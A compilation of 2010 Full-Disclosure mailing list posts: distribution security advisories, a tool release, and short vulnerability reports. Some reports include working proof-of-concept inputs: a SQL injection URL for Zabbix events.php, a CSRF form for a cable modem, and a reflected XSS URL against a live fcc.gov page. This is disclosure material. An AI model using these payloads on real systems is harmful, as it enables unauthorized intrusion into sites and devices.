Re: [Full-disclosure] Anybody know about "hack0wn" website please let me know
I guess just from poking around the site for several seconds and finding obvious SQL injections and numerous copy+pasted code, I would say don't use them lol. /view.php?xroot=80.0+1&cat=papers > and if they refer to themselves as "Elite h4x0rs", you should probably just move on to the next site... > > > -- Freelance Web/Desktop Developer http://fusecurity.com/ | "Free Security Technology" http://www.rentacoder.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SQL injection vulnerability in Zabbix <= 1.8.1
Product: Zabbix Vendor: Zabbix SIA References: http://www.securityfocus.com/bid/39752 http://secunia.com/advisories/39119 Software Link: http://www.zabbix.com/ Vulnerable Version: <= 1.8.1 Vulnerability Type: SQL Injection Status: Fixed in version 1.8.2 Risk level: Medium Author: David "skys" Guimaraes (skysbsb[at]gmail.com) Date: 27/04/2010 Vulnerability Details: The vulnerability exists due to failure in the "events.php" script to properly sanitize user-supplied input in "nav_time" variable. Attacker can execute arbitrary queries to the database, compromise the application or exploit various vulnerabilities in the underlying SQL database. Attacker can use browser to exploit this vulnerability. The following PoC is available: http://vulnsite.com/path_to_zabbix/events.php?nav_time=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7+from+events+where+(testvalue)-- Positive response page contains: "\"info\">1" -- David "skys" Guimaraes ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Scientific Atlanta DPC2100 WebSTAR Cable Modem vulnerabilities
=== Scientific Atlanta DPC2100 Cable Modem Cross-Site Request Forgery and Insufficient Authentication May 24, 2010 CVE-2010-2025, CVE-2010-2026 === ==Description== Scientific Atlanta, a Cisco company (www.cisco.com), produces the WebSTAR line of cable modems, which are widely deployed by cable providers, especially for home usage. Certain versions of the firmware for the DPC2100 model feature a web interface that is vulnerable to the following issues. Testing was performed on a DPC2100R2 modem, with firmware v2.0.2r1256-060303. Other WebSTAR modems and firmware versions may be vulnerable as well. 1. Cross-site request forgery (CSRF). Several features provided by the web interface fail to properly establish sessions that restrict access to authorized users, including forms for changing the administrative password, resetting the modem, and installing new firmware. An attacker may create a malicious website that, when visited by a victim, updates these settings on the victim's modem on the victim's behalf without their authorization or need for any additional user interaction. This can be used to deny service by resetting the modem or wiping the firmware, to change the default administrative password, or potentially to steal information from the victim by installing malicious firmware. This issue has been assigned CVE-2010-2025. 2. Insufficient authentication. The modem's access control scheme, which has levels numbered from 0-2 (or 0-3 on some other models), is not properly checked before performing operations that should require authentication, including resetting the modem and installing new firmware. The modem requires the proper access level to access web interface pages containing forms that allow a user to perform these actions, but does not properly authenticate the pages that actually carry out these actions. By sending a POST request directly to these pages, these actions may be performed without any authentication. Attacks may be performed by an attacker on the local network or by leveraging the CSRF vulnerability. This issue has been assigned CVE-2010-2026. ==Identifying Vulnerable Installations== Most home installations of this modem will feature a web interface that is accessible at "http://192.168.100.1";. The following proof-of-concept code may be used to test for vulnerability. It leverages the CSRF vulnerability to change the access level of your modem to the most restrictive settings (a harmless action). If your modem is vulnerable, then you will be presented with a message stating that your settings have been successfully updated. If you are greeted with a page stating there was a "Password confirmation error", then your modem password has been changed from the default but you are still vulnerable. If you are greeted with an HTTP authentication form or other message, then your model is not vulnerable. Test for CSRF vulnerability in WebSTAR modems http://192.168.100.1/goform/_aslvl";> document.csrf.submit() ==Solution== In most cases, home users will be unable to update vulnerable firmware without assistance from their cable providers. If your firmware is vulnerable, contact your cable provider and request a firmware update to the latest version. For the DPC2100R2 modems, the latest version string is dpc2100R2-v202r1256-100324as. To prevent exploitation of CSRF vulnerabilities, users are always encouraged to practice safe browsing habits and avoid visiting unknown or untrusted websites. ==Credits== These vulnerabilities were discovered by Dan Rosenberg (dan.j.rosenb...@gmail.com). Thanks to Matthew Bergin for suggesting I should look at cable modems. ==Timeline== 1/26/10 - Vulnerability reported to Cisco 1/26/10 - Response, issue assigned internal tracking number 2/26/10 - Status update requested 2/26/10 - Response 5/15/10 - Status update requested 5/17/10 - Response, confirmation that newest firmware resolves issues 5/17/10 - Disclosure date set 5/24/10 - Disclosure ==References== CVE identifiers CVE-2010-2025 and CVE-2010-2026 have been assigned to these issues. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:106 ] aria2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:106 http://www.mandriva.com/security/ ___ Package : aria2 Date: May 24, 2010 Affected: 2009.0, 2009.1, 2010.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability was discovered in aria2 which allows remote attackers to create arbitrary files via directory traversal sequences in the name attribute of a file element in a metalink file (CVE-2010-1512). This update fixes this issue. Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490 ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1512 ___ Updated Packages: Mandriva Linux 2009.0: 5ea05c2ad0ae20f6e6ec2407d7ec687c 2009.0/i586/aria2-0.15.3-0.20080918.3.2mdv2009.0.i586.rpm 23fe7be66e5ab872ecd529d6b4adb333 2009.0/SRPMS/aria2-0.15.3-0.20080918.3.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 7aef880fdb7cf05f04d3e5ffec5a88b4 2009.0/x86_64/aria2-0.15.3-0.20080918.3.2mdv2009.0.x86_64.rpm 23fe7be66e5ab872ecd529d6b4adb333 2009.0/SRPMS/aria2-0.15.3-0.20080918.3.2mdv2009.0.src.rpm Mandriva Linux 2009.1: defb85a38a22de997415c21d06e4a98f 2009.1/i586/aria2-1.2.0-0.20090201.5.3mdv2009.1.i586.rpm 604a90cb5d6c306c86a6d0eb9b408400 2009.1/SRPMS/aria2-1.2.0-0.20090201.5.3mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 3438511cfd153c536d867bbfc0f77c28 2009.1/x86_64/aria2-1.2.0-0.20090201.5.3mdv2009.1.x86_64.rpm 604a90cb5d6c306c86a6d0eb9b408400 2009.1/SRPMS/aria2-1.2.0-0.20090201.5.3mdv2009.1.src.rpm Mandriva Linux 2010.0: 36bc7a159d8c274e43a6ba0b9b5bd5cf 2010.0/i586/aria2-1.6.2-1.4mdv2010.0.i586.rpm 8750b5dc33e770d1c482a0816a6c117e 2010.0/SRPMS/aria2-1.6.2-1.4mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 19a28817e1009d43272161f72bdc1148 2010.0/x86_64/aria2-1.6.2-1.4mdv2010.0.x86_64.rpm 8750b5dc33e770d1c482a0816a6c117e 2010.0/SRPMS/aria2-1.6.2-1.4mdv2010.0.src.rpm Mandriva Enterprise Server 5: 44ff68b509e581bd4b7bccbb219b7d8d mes5/i586/aria2-0.15.3-0.20080918.3.2mdvmes5.1.i586.rpm 378aa9a1713fe97bf4ad025b38a68c3b mes5/SRPMS/aria2-0.15.3-0.20080918.3.2mdv2009.0.src.rpm Mandriva Enterprise Server 5/X86_64: bd717edf887ab38d2e05e0b407eaa6bb mes5/x86_64/aria2-0.15.3-0.20080918.3.2mdvmes5.1.x86_64.rpm 378aa9a1713fe97bf4ad025b38a68c3b mes5/SRPMS/aria2-0.15.3-0.20080918.3.2mdv2009.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFL+oPRmqjQ0CJFipgRAgK9AJ0dOVRUicAJZoXYE2Jmk+uMAIc/CACg9NAv OAZKpqeq6/usZzsSOhC0KRo= =+ClR -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2051-1] New postgresql-8.3 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2051-1 secur...@debian.org http://www.debian.org/security/ Moritz Muehlenhoff May 24, 2010 http://www.debian.org/security/faq - Package: postgresql-8.3 Vulnerability : several Problem type : local Debian-specific: no CVE Id(s) : CVE-2010-0442 CVE-2010-1169 CVE-2010-1170 CVE-2010-1975 Several local vulnerabilities have been discovered in PostgreSQL, an object-relational SQL database. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2010-1169 Tim Bunce discovered that the implementation of the procedural language PL/Perl insufficiently restricts the subset of allowed code, which allows authenticated users the execution of arbitrary Perl code. CVE-2010-1170 Tom Lane discovered that the implementation of the procedural language PL/Tcl insufficiently restricts the subset of allowed code, which allows authenticated users the execution of arbitrary Tcl code. CVE-2010-1975 It was discovered that an unprivileged user could reset superuser-only parameter settings. For the stable distribution (lenny), these problems have been fixed in version 8.3.11-0lenny1. This update also introduces a fix for CVE-2010-0442, which was originally scheduled for the next Lenny point update. For the unstable distribution (sid), these problems have been fixed in version 8.4.4-1 of postgresql-8.4. We recommend that you upgrade your postgresql-8.3 packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.11.orig.tar.gz Size/MD5 checksum: 13913683 02472af037929fe30405d1497f07421d http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.11-0lenny1.diff.gz Size/MD5 checksum:50334 717569100b751cfc3c18ca82b70fd0f4 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.11-0lenny1.dsc Size/MD5 checksum: 1673 725fcd67e1b92cc9bd9f78c9aefa1d83 Architecture independent packages: http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql_8.3.11-0lenny1_all.deb Size/MD5 checksum: 263636 9dd154ff43d8dd67cbc9e92a91156362 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client_8.3.11-0lenny1_all.deb Size/MD5 checksum: 263608 ef90b5f536cff943601e3b12f42f18c7 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib_8.3.11-0lenny1_all.deb Size/MD5 checksum: 263506 f5c5e8f917b6275b9a25d5c4abf5a1f7 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-doc-8.3_8.3.11-0lenny1_all.deb Size/MD5 checksum: 2194706 0cf86f435601423485565bc69e53c837 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-doc_8.3.11-0lenny1_all.deb Size/MD5 checksum: 263450 1605ce58c660805db2cf8856ec416d2d alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.11-0lenny1_alpha.deb Size/MD5 checksum: 833060 cf22e01a9227a279be3d5338328d9f4e http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.11-0lenny1_alpha.deb Size/MD5 checksum: 485598 ba9abe30da3eac9f42e927314c010633 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.11-0lenny1_alpha.deb Size/MD5 checksum: 292830 fc0a66d65d86b50de0f1fa9dc1964e6b http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.11-0lenny1_alpha.deb Size/MD5 checksum: 282624 839273128e95d0687daaf569abcef024 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.11-0lenny1_alpha.deb Size/MD5 checksum: 292710 906574dc9d5dc2b64e5bcb4b2f81d841 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.11-0lenny1_alpha.deb Size/MD5 checksum: 292084 315ceae207f68f94b2afcf48c618de7c http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.11-0lenny1_alpha.deb Size/MD5 checksum: 629712
[Full-disclosure] [SECURITY] [DSA 2050-1] New kdegraphics packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2050-1 secur...@debian.org http://www.debian.org/security/ Moritz Muehlenhoff May 24, 2010 http://www.debian.org/security/faq - Package: kdegraphics Vulnerability : several Problem type : local(remote) Debian-specific: no CVE Id(s) : CVE-2009-1188 CVE-2009-3603 CVE-2009-3604 CVE-2009-3606 CVE-2009-3608 CVE-2009-3609 Several local vulnerabilities have been discovered in KPDF, a PDF viewer for KDE, which allow the execution of arbitrary code or denial of service if a user is tricked into opening a crafted PDF document. For the stable distribution (lenny), these problems have been fixed in version 4:3.5.9-3+lenny3. The unstable distribution (sid) no longer contains kpdf. It's replacement, Okular, links against the poppler PDF library. We recommend that you upgrade your kdegraphics packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.9-3+lenny3.diff.gz Size/MD5 checksum: 331735 eb19c67b63df9bea8113c6ce0570f99b http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.9-3+lenny3.dsc Size/MD5 checksum: 2100 4332314f48c3583068f8a4144d4c1e4d http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.9.orig.tar.gz Size/MD5 checksum: 9058343 d66472f22db2dc5b706ed4f52d9b16f5 Architecture independent packages: http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.9-3+lenny3_all.deb Size/MD5 checksum:14088 db2f2157980256b214726dd8d285cf9c http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-doc-html_3.5.9-3+lenny3_all.deb Size/MD5 checksum: 146838 f3b12df069df5e721bbae57fe4a0fb10 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.9-3+lenny3_alpha.deb Size/MD5 checksum: 1426340 d87a0e5f0442b7fc64dc31d27be094b2 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.9-3+lenny3_alpha.deb Size/MD5 checksum: 507416 f4b8e0f7d541a103209d9e78aad3019c http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.9-3+lenny3_alpha.deb Size/MD5 checksum: 2414178 164a5f542ca883185f83b28ce96a8215 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.9-3+lenny3_alpha.deb Size/MD5 checksum: 331616 495d561d9ad550890dbac900c114aa8d http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.9-3+lenny3_alpha.deb Size/MD5 checksum:62098 0147890917b354e67765f26f70515690 http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.9-3+lenny3_alpha.deb Size/MD5 checksum: 147112 b10356b326bd4b40ca61edbeac8a2367 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.9-3+lenny3_alpha.deb Size/MD5 checksum: 1136886 6fb9148b54b3227df55204c5f278f6a7 http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.9-3+lenny3_alpha.deb Size/MD5 checksum: 252536 39ea86786322108507e7517595d5f315 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.9-3+lenny3_alpha.deb Size/MD5 checksum: 110180 3051edb3012f0959eaa99356234ecefd http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.9-3+lenny3_alpha.deb Size/MD5 checksum: 445578 fe3a6bce17c1aebc0d6b13ff18cc3e9e http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.9-3+lenny3_alpha.deb Size/MD5 checksum: 547246 8a6cd8c49cfe527f3e7ab27294d8895d http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.9-3+lenny3_alpha.deb Size/MD5 checksum: 113248 4cffc9361cd05d4bc35af2173a0bec36 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.9-3+lenny3_alpha.deb Size/MD5 checksum: 772790 e8eff7f950f54450e2f0e6cbbdd8d34a http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.9-3+lenny3_alpha.deb Size/MD5 checksum: 902622 42ab9a2b41f0288cfb9fef469b9a3194 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.
[Full-disclosure] WhatWeb version 0.4.3 released
I've just released a new version of WhatWeb with new features and plugins. You can read more and download it from http://www.morningstarsecurity.com/research/whatweb DESCRIPTION Identify content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries, servers and more. When you visit a website in your browser the transaction includes many unseen hints about how the webserver is set up and what software is delivering the webpage. Some of these hints are obvious, eg. "Powered by XYZ" and others are more subtle. WhatWeb recognises these hints and reports what it finds. WhatWeb has over 90 plugins and needs community support to develop more. Plugins can identify systems with obvious identifying hints removed by also looking for subtle clues. For example, a WordPress site might remove the tag but the WordPress plugin also looks for "wp-content" which is less easy to disguise. Plugins are flexible and can return any datatype, for example plugins can return version numbers, email addresses, account ID's and more. There are both passive and aggressive plugins, passive plugins use information on the page, in cookies and in the URL to identify the system. A passive request is as light weight as a simple GET / HTTP/1.1 request. Aggressive plugins guess URLs and request more files. Plugins are easy to write, you don't need to know ruby to make them. CHANGES Version 0.4.3 Released May 24th 2010 * Added GPLv2 notices * Added Makefile (Thanks Michal Ambroz ) * Added man pages (Thanks Michal Ambroz ) * Added --version * Added Invalid command line argument handling * Added @cookie variable to plugins but is not availble for recursive use * Changed output colour of page titles * Changed plugin names to use a CamelCase convention * Merged the google analytics GA and Urchin plugins * Modified MovableType plugin * Added Cookie names plugin * Added Concrete5 CMS plugin * Added CushyCMS plugin * Added FrogCMS plugin * Added ModxCMS plugin * Added TypoLight plugin * Added ExpressionEngine plugin * Fixed a bug in Tomcat plugin * New feature, my-plugins/ folder. Keep your personal plugins separate. * Usage info shows correct defaults * Fixed a bug where aggressive plugins didn't use the proxy settings * Added XML (naive) logging * Updated usage to show how to pipe HTML to /dev/stdin * Added --no-redirect option. Do not follow HTTP 3xx redirects Homepage: http://www.morningstarsecurity.com/research/whatweb -- Cheers, Andrew Horton MorningStar Security Mobile +64 (0) 272 646 959 Web www.morningstarsecurity.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anybody know about 'hack0wn' website please let me know
The Exploit Database http://www.exploit-db.com/ maintained by Offensive Security is being updated in daily basis. Juha-Matti rajendra prasad [rajendra.paln...@gmail.com] wrote: > Hi List, > > I am searching for the good website for tracking vulnerabilities and > exploits. milw0rm.com is one of the famous website, because it is stopped, > which website is providing the best services as milw0rm. i found > hack0wn.comwebsite. is this website trust worthy? can we track this > website for the > regular latest vulnerabilities?. or else could you please provide a list of > websites for daily tracking for new vulnerabilities and exploits. > > Thanks > Kaushal. > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Anybody know about "hack0wn" website please let me know
Hi List, I am searching for the good website for tracking vulnerabilities and exploits. milw0rm.com is one of the famous website, because it is stopped, which website is providing the best services as milw0rm. i found hack0wn.comwebsite. is this website trust worthy? can we track this website for the regular latest vulnerabilities?. or else could you please provide a list of websites for daily tracking for new vulnerabilities and exploits. Thanks Kaushal. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: Ziproxy Two Integer Overflow Vulnerabilities
== Secunia Research 24/05/2010 - Ziproxy Two Integer Overflow Vulnerabilities - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Ziproxy 3.0.0 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: Remote == 3) Vendor's Description of Software "Ziproxy is forwarding, non-caching, compressing HTTP proxy server. Basically it squeezes images by converting them to lower quality JPEGs or JPEG 2000 and compresses (gzip) HTML and other text-like data.". Product Link: http://ziproxy.sourceforge.net/ == 4) Description of Vulnerability Secunia Research has discovered two vulnerabilities in Ziproxy, which can be exploited by malicious people to compromise a vulnerable system. 1) An integer overflow within the "jpg2bitmap()" function in src/image.c can be exploited to cause a heap-based buffer overflow via specially crafted JPG images. 2) An integer overflow within the "png2bitmap()" function in src/image.c can be exploited to cause a heap-based buffer overflow via specially crafted PNG images. == 5) Solution Update to version 3.0.1. == 6) Time Table 19/05/2010 - Vendor notified. 19/05/2010 - Vendor response. 20/05/2010 - Vendor issues fixed version. 24/05/2010 - Public disclosure. == 7) Credits Discovered by Stefan Cornelius, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-1513 for the vulnerabilities. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-75/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rPSA-2010-0039-1 openssl openssl-scripts
rPath Security Advisory: 2010-0039-1 Published: 2010-05-23 Products: rPath Appliance Platform Linux Service 1 rPath Appliance Platform Linux Service 2 rPath Linux 1 rPath Linux 2 Rating: Minor Exposure Level Classification: Remote User Deterministic Weakness Updated Versions: openssl=conary.rpath@rpl:1/0.9.7f-10.19-1 openssl=conary.rpath@rpl:2/0.9.8g-7.5-2 openssl-scripts=conary.rpath@rpl:2/0.9.8g-7.5-2 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-3201 References: http://bugs.contribs.org/show_bug.cgi?id=195 Description: A flaw in previous versions of OpenSSL could allow a malicious client to force a ciphersuite not supported by the server to be used for a session between the client and the server, which can result in disclosure of sensitive information. This has been fixed. http://wiki.rpath.com/Advisories:rPSA-2010-0039 Copyright 2010 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] fcc.gov XSS
There seem to be a few more problems with that script than just that XSS...
For example, going to the Application Search page root (the page that takes
you to that one, presumably) and selecting literally everything in the
Services listbox will net you an error reporting "Incorrect syntax near ','"
for server 'HEIMDAL'. It apparently occurs on line 4. I dunno.
I'm not gonna mess around with it too much though :)
On Mon, May 24, 2010 at 12:58 AM, Marshall Whittaker <
marshallwhitta...@gmail.com> wrote:
> FCC.gov XSS
>
> --- CODE ---
>
>
> http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791&File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert('h4x0r3d');%3C/script%3E
>
> --- CODE ---
>
> --oxagast
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] fcc.gov XSS
FCC.gov XSS
--- CODE ---
http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791&File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert('h4x0r3d');%3C/script%3E
--- CODE ---
--oxagast
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
